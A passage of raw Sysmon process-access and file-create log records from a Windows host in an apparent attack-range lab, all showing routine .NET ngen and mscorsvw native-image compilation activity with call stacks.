ows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.853{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B403-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.837{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B403-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B403-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:12.791{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a8-0\Microsoft.VisualC.dll2021-01-18 13:50:12.791 10341000x80000000000000007995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.759{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.759{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.728{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B203-00000000A301}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.712{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B203-00000000A301}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.712{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B203-00000000A301}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:12.650{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11c4-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-01-18 13:50:12.650 10341000x80000000000000007988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.353{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.353{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B103-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.275{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B003-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B003-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B003-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:12.181{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11c8-0\Microsoft.VisualBasic.Compatibility.dll2021-01-18 13:50:12.181 10341000x80000000000000008038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.947{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-C103-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.931{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-C103-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.931{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-C103-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.806{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-C003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.791{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-C003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.791{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-C003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.572{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BF03-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 